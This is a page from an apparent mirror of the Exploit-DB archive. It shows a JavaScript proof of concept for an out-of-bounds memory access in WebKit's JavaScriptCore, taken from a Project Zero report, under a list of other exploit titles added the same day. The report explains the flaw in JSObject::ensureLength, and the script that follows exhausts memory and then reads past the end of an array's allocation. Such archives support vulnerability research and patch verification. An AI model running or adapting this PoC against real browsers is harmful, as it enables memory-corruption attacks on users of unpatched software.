bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/dos/42103.js
Offensive Security 42e94b4366 DB: 2017-06-05 
26 new exploits

Microsoft MsMpEng - Remotely Exploitable Use-After-Free due to Design Issue in GC Engine

Microsoft MsMpEng - Multiple Crashes While Scanning Malformed Files
Microsoft MsMpEng - Use-After-Free via Saved Callers
WebKit JSC - 'JSObject::ensureLength' ensureLengthSlow Check Failure
WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope
WebKit - 'Element::setAttributeNodeNS' Use-After-Free
reiserfstune 3.6.25 - Local Buffer Overflow

TiEmu 2.08 - Local Buffer Overflow
Octopus Deploy - Authenticated Code Execution (Metasploit)
Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit)

CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities

Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes)
Linux/x86 - execve(_/bin/sh_) Shellcode (21 bytes)

uc-http Daemon - Local File Inclusion / Directory Traversal
Trend Micro Deep Security version 6.5 - XML External Entity Injection / Local Privilege Escalation / Remote Code Execution
KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution
IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow

WordPress Plugin Huge-IT Video Gallery 2.0.4 - SQL Injection
TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root
Piwigo Plugin Facetag 0.0.3 - SQL Injection
OV3 Online Administration 3.0 - Directory Traversal
OV3 Online Administration 3.0 - Remote Code Execution
OV3 Online Administration 3.0 - SQL Injection
Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting
Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read
WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting
WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting
WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting
2017-06-05 05:01:15 +00:00

53 lines
1.3 KiB
JavaScript
Executable file
Raw Blame History

/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1165
Here's a snippet of JSObject::ensureLength.
bool WARN_UNUSED_RETURN ensureLength(VM& vm, unsigned length)
{
ASSERT(length < MAX_ARRAY_INDEX);
ASSERT(hasContiguous(indexingType()) || hasInt32(indexingType()) || hasDouble(indexingType()) || hasUndecided(indexingType()));
bool result = true;
if (m_butterfly.get()->vectorLength() < length)
result = ensureLengthSlow(vm, length);
if (m_butterfly.get()->publicLength() < length)
m_butterfly.get()->setPublicLength(length);
return result;
}
|setPublicLength| is called whether |ensureLengthSlow| failed or not. So the |publicLength| may be lager than the actual allocated memory's size, which results in an OOB access.
Tested on Linux.
PoC:
*/
const kArrayLength = 0x200000;
let arr = new Array(kArrayLength);
arr.fill({});
let exh = [];
try {
for (;;) {
exh.push(new ArrayBuffer(kArrayLength * 8 * 8));
}
} catch (e) {
}
try {
arr.length *= 8;
print('failed');
} catch (e) {
print(e);
exh = null;
print('arr length: ' + arr.length.toString(16));
for (let i = kArrayLength, n = arr.length; i < n; i++) {
if (arr[i])
print(arr[i]);
}
}
Reference in a new issue View git blame Copy permalink